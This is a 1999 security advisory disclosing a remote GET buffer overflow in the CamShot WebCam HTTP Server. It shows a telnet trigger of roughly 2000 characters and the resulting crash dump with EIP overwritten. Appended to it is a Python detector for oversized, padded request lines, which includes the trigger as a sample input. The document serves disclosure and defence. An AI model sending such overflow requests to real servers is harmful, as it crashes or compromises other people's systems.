---------- Forwarded message ----------
From: "Ussr Labs"
To: "TECHNOTRONIC"
Subject: Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT
Date: Thu, 30 Dec 1999 14:04:14 -0300

Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT

USSR Advisory Code: USSR-99028
Release Date: December 30, 1999 [4/5]

Systems Affected:
CamShot WebCam HTTP Server v2.5 for Win9x and possibly other versions.

About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages containing time stamped images captured from a video camera. The images can be viewed from anywhere on the network with a web browser. CamShot works with 'Video For Windows' compatible video equipment. Finally a cheap and simple way to do remote surveillance is here!

THE PROBLEM
UssrLabs found a Local / Remote Buffer overflow. The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution to w00giving for all you w00nderful people out there. You do know what w00giving is, don't you?
http://www.w00w00.org/advisories.html

Example
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1

Where [buffer] is approx. 2000 characters. At this point the server overflows, and on the remote machine someone will see something like this:

CAMSHOT caused an invalid page fault in module at 0000:61616161.
Registers:
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74 005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

Binary or source for this Exploit (when we finish it):
http://www.ussrback.com/

Vendor Status: Informed.
Vendor Url: http://www.broadgun.com/arcit/index.html
Program Url: http://broadgun.com/Camshot.htm
Credit: USSRLABS

SOLUTION
Nothing yet.

Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip.

u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
http://www.ussrback.com
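Since the advisory offers no fix, the practical defence while the vendor is unpatched is to spot the trigger on the wire: an oversized GET request target, typically padded with one repeated byte (the crash dump's EIP=61616161 is the 'a' padding). The following detector is an added example, not part of the advisory or of CamShot; the 1024-byte length ceiling, the 64-byte repeat-run limit and the sample request lines are assumptions constructed for it.

```python
import re
# Thresholds are assumptions for this example: the advisory reports the crash
# at roughly 2000 characters, so a 1024-byte ceiling still catches the attempt
# while leaving CamShot's short image URLs untouched.
MAX_TARGET_LEN = 1024
MAX_REPEAT_RUN = 64  # longest run of one repeated byte tolerated in a target
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/\d\.\d)?$")

def longest_run(s: str) -> tuple:
    """Return (length, char) of the longest run of one repeated character."""
    best_len, best_ch, run, prev = 0, "", 0, None
    for ch in s:
        run = run + 1 if ch == prev else 1
        prev = ch
        if run > best_len:
            best_len, best_ch = run, ch
    return best_len, best_ch

def analyze_request_line(line: str) -> dict:
    """Classify one HTTP request line; 'reasons' is empty for benign lines."""
    m = REQUEST_LINE.match(line.rstrip("\r\n"))
    if not m:
        return {"method": None, "suspicious": True, "reasons": ["malformed request line"]}
    target, reasons = m.group("target"), []
    if len(target) > MAX_TARGET_LEN:
        reasons.append(f"target length {len(target)} > {MAX_TARGET_LEN}")
    run_len, run_ch = longest_run(target)
    if run_len > MAX_REPEAT_RUN:
        # A long run of one byte is the classic overflow filler; the advisory's
        # crash shows EIP=61616161, i.e. the 'a' (0x61) padding reached EIP.
        reasons.append(f"fill run of {run_len} x 0x{ord(run_ch):02x}")
    return {"method": m.group("method"), "suspicious": bool(reasons), "reasons": reasons}

# Constructed sample lines (not captured traffic): two normal CamShot requests,
# one shaped like the advisory's trigger, one long but benign path.
SAMPLE_REQUEST_LINES = [
    "GET /camshot.jpg HTTP/1.0",
    "GET /index.html HTTP/1.1",
    "GET " + "a" * 2000 + " HTTP/1.1",
    "GET /" + "A" * 40 + "/x.jpg HTTP/1.0",
]

def scan(lines) -> list:
    """Return (index, reasons) for every suspicious request line."""
    hits = []
    for i, line in enumerate(lines):
        result = analyze_request_line(line)
        if result["suspicious"]:
            hits.append((i, result["reasons"]))
    return hits
```

Running `scan(SAMPLE_REQUEST_LINES)` flags only the third line, on both the length and the fill-run rule; the same two checks can be dropped into a proxy or IDS in front of the server until a fixed version exists.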